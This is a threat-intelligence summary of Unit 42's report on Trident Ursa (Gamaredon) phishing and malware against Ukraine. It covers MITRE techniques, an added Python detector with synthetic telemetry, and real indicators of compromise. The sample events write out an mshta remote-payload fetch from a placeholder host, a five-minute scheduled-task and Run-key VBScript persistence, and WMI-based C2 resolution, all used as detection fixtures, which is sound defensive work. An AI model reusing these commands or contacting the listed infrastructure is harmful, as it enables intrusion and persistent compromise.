Unit 42 documents continued Trident Ursa (Gamaredon) activity targeting Ukraine, detailing a long-running, multi-faceted campaign with hundreds of new domains and samples. The analysis highlights DNS manipulation, phishing campaigns delivering LNK/HTA/VBS payloads, and persistent, multi-stage C2 and evasion techniques.
#TridentUrsa #Gamaredon #Ukraine #Unit42 #Anton
Keypoints
- Trident Ursa remains a pervasive, active APT focused on Ukraine and allied networks, attributed to Russia’s FSB.
- Unit 42 mapped over 500 new domains, 200 samples, and other IoCs in roughly the last 10 months to support Trident Ursa’s phishing and malware operations.
- Notable items include an unsuccessful attempt to compromise a large NATO member petroleum refinery and threats against Ukrainian researchers tied to the group.
- DNS-centric techniques, including fast flux and innovative DNS workarounds, are central to the group’s resilience and evasion.
- Phishing campaigns use HTML and Word documents delivering LNKs/HTAs with VBScript payloads and persistence mechanisms (scheduled tasks and registry run keys).
- Droppers like 7ZSfxMod_x86.exe and Myfile.exe, plus VBScript-based payloads, drive the C2 and post-compromise behavior with multiple fallback IPs and Telegram lookups.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – HTML files delivered as attachments/links containing malicious content that leads to LNK-based execution. “These .html files contain Base64-encoded .rar archives that in turn contain a malicious .lnk file.”
- [T1218.005] System Binary Proxy Execution: Mshta – The LNK passes a URL to mshta.exe on its command line, so the signed Windows binary fetches and executes the remote payload. “the .lnk shortcut uses mshta.exe to contact via a command line argument.”
- [T1059.005] Command and Scripting Interpreter: VBScript – VBScript is decoded/executed and used for persistence and payload delivery. “The VBScript decoded and executed by the file is responsible for adding persistence by running the VBScript saved to the josephine file each time the user logs in.”
- [T1105] Ingress Tool Transfer – Downloading additional files via URL to stage further payloads. “download additional files via URL”
- [T1053.005] Scheduled Task – Persistence by creating a Windows scheduled task that runs payloads every five minutes. “Filmora.Complete scheduled task… runs the josephine script every five minutes.”
- [T1112] Modify Registry – Registry-based persistence via an autorun key. “autorun registry key… run the VBScript at user login.”
- [T1547.001] Boot or Logon Autostart: Registry Run Keys/Startup Folder – Similar autostart persistence via registry keys. “telemetry… run the VBScript at user login.”
- [T1047] Windows Management Instrumentation – The VBScript resolves its C2 domain with a WMI Win32_PingStatus query rather than a conventional DNS API call, reading the resolved address from the ProtocolAddress property. “WMI query and checking the ProtocolAddress value to determine the C2 IP address.”
- [T1071.001] Web Protocols – C2 communication over HTTP(S): the script issues a “custom HTTP GET request” and executes the VBScript returned in the response.
- [T1027] Obfuscated Files or Information – Bundled payloads and random strings that hinder analysis. “random 10-character strings… appended… confuses analysis.”
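The execution and persistence chain in the technique list above (mshta.exe launched with a remote URL, a script host scheduled every five minutes, a Run-key value pointing at a VBScript, and Win32_PingStatus used as a covert resolver) maps cleanly onto a few command-line and registry patterns. The following is an added detection example, not code from Unit 42 or from the report; the events it runs over are constructed, the file paths, the task and value names beyond those quoted on the page, and the host phish.example.invalid are placeholders, and the indicator lists are the ones from the IoC section below.

```python
"""Flag the Trident Ursa execution/persistence chain in constructed process,
registry and WMI telemetry (added example; events are synthetic)."""
import re
from dataclasses import dataclass

# Indicators taken from the page's IoC section (lower-cased for matching).
IOC_DOMAINS = {"josephine71.alabarda.ru", "relax.salary48.minhizo.ru"}
IOC_IPS = {"104.248.36.191", "64.227.67.175"}
IOC_FILES = {"along.rcs", "7zsfxmod_x86.exe", "myfile.exe",
             "militaryassistanceofukraine.htm", "necessary_military_assistance.rar"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
WMI_PING_RE = re.compile(r"win32_pingstatus\s+where\s+address\s*=\s*'([^']+)'", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
SCRIPT_HOST_RE = re.compile(r"wscript|cscript|\.vbs\b", re.I)


@dataclass
class Event:
    kind: str            # "process", "registry" or "wmi"
    image: str = ""      # process image path (process events)
    cmdline: str = ""    # full command line (process events)
    target: str = ""     # registry value path, or WMI query text
    details: str = ""    # registry value data


def check_event(ev: Event) -> list[tuple[str, str]]:
    """Return (technique, reason) pairs that fire for a single event."""
    hits = []
    if ev.kind == "process":
        exe = ev.image.lower().rsplit("\\", 1)[-1]
        url = URL_RE.search(ev.cmdline)
        # T1218.005: mshta.exe handed a remote URL instead of a local .hta
        if exe == "mshta.exe" and url:
            hits.append(("T1218.005", f"mshta.exe launched with remote URL {url.group(0)}"))
        # T1053.005: a script host re-run on a minute-scale repeat interval
        if exe == "schtasks.exe" and re.search(r"/sc\s+minute", ev.cmdline, re.I):
            mo = re.search(r"/mo\s+(\d+)", ev.cmdline, re.I)
            if mo and int(mo.group(1)) <= 5 and SCRIPT_HOST_RE.search(ev.cmdline):
                hits.append(("T1053.005", f"script host scheduled every {mo.group(1)} min"))
    elif ev.kind == "registry":
        # T1547.001: a Run/RunOnce value whose data invokes a script host
        if RUN_KEY_RE.search(ev.target) and SCRIPT_HOST_RE.search(ev.details):
            value_name = ev.target.rsplit("\\", 1)[-1]
            hits.append(("T1547.001", f"Run key value {value_name} points at a script host"))
    elif ev.kind == "wmi":
        # T1047: Win32_PingStatus abused to resolve a hostname (DNS via WMI)
        m = WMI_PING_RE.search(ev.target)
        if m:
            hits.append(("T1047", f"Win32_PingStatus used to resolve {m.group(1)}"))
    # Independently of behaviour, report any overlap with the page's IoCs.
    blob = " ".join((ev.image, ev.cmdline, ev.target, ev.details)).lower()
    for ioc in sorted(IOC_DOMAINS | IOC_IPS | IOC_FILES):
        if ioc in blob:
            hits.append(("IOC", f"matches indicator {ioc}"))
    return hits


def scan(events: list[Event]) -> list[tuple[int, str, str]]:
    """Run check_event over a list and tag each hit with the event index."""
    return [(i, tech, why) for i, ev in enumerate(events) for tech, why in check_event(ev)]


# Constructed sample telemetry (not from the report). Paths, the task's
# command line and the URL host are placeholders; the task name and the
# 'josephine' file name are the ones the page quotes.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\mshta.exe",
          r'"C:\Windows\System32\mshta.exe" http://phish.example.invalid/'),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn Filmora.Complete /sc minute /mo 5 '
          r'/tr "wscript.exe //e:vbscript C:\Users\user\AppData\Local\Temp\josephine"'),
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\telemetry",
          details=r"wscript.exe //e:vbscript C:\Users\user\AppData\Local\Temp\josephine"),
    Event("wmi", target="Select * From Win32_PingStatus where address = 'josephine71.alabarda.ru'"),
    # Two benign look-alikes that must not fire: a local .hta and a daily task.
    Event("process", r"C:\Windows\System32\mshta.exe",
          r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn Backup /sc daily /tr "C:\Tools\backup.exe"'),
]

if __name__ == "__main__":
    for idx, tech, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tech} - {why}")
```

The interval threshold and the script-host pattern are the tuning knobs: the five-minute repeat is what the page describes, but a task that re-runs any script host more often than a few times an hour is rare on a workstation and worth surfacing regardless of the name it carries.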
Indicators of Compromise
- [Hash] SHA256 hashes of the English-language samples – b1bc659006938eb5912832eb8412c609d2d875c001ab411d1b69d343515291b7, 0b63f6e7621421de9968d46de243ef769a343b61597816615222387c45df80ae, 303abc6d8ab41cb00e3e7a2165ecc1e7fb4377ba46a9f4213a05f764567182e5
- [Filename] Notable phishing attachments – MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar
- [Domain] Domains used in infrastructure – josephine71.alabarda.ru, relax.salary48.minhizo.ru
- [IP] C2 and infrastructure IPs – 104.248.36.191, 64.227.67.175
- [Filename] Droppers and payloads – along.rcs, 7ZSfxMod_x86.exe, Myfile.exe
Read more: https://unit42.paloaltonetworks.com/trident-ursa/